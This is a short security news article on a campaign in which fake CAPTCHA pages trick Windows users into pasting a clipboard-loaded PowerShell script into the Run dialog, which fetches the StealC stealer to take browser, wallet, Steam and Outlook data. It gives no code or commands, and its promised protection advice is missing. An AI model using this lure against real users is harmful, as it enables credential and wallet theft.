Hackers used fake CAPTCHA pages to spread malware on Windows

How attackers use fake CAPTCHA pages

New researchers have discovered a vulnerability that allows hackers to trick Windows users into running a malicious PowerShell script. The script, called Stealthy StealC Information Stealer, steals data from browsers, cryptocurrency wallet passwords, Steam and Outlook accounts, and then sends all of this along with screenshots to a command‑and‑control server.

What happens during the attack?

1. Fake CAPTCHA pages

Hackers place a counterfeit verification interface that looks like a normal CAPTCHA page. On these pages the user sees a “prompt” to press Windows + R (open the Run dialog) and then Ctrl + V (paste from clipboard).

2. Launching PowerShell from the clipboard

An executable PowerShell script is preloaded into the clipboard. The user, following the instruction, runs it manually without realizing its malicious nature.

3. Downloading and spreading code

After launch, the script connects to a remote server and downloads additional malware. Traffic is encrypted with RC4, making it harder to detect with standard security tools.

Why is this dangerous?

- Bypassing traditional defenses – normal file‑download blocking mechanisms may not work because the script is already running in the system.
- Wide range of stolen data – from browser passwords to cryptocurrency keys and accounts on popular services.
- Invisibility to the user – the action looks like a routine security check, not malware execution.

How to protect yourself?

By following these recommendations, you can significantly reduce the risk of a user becoming a victim of such an attack.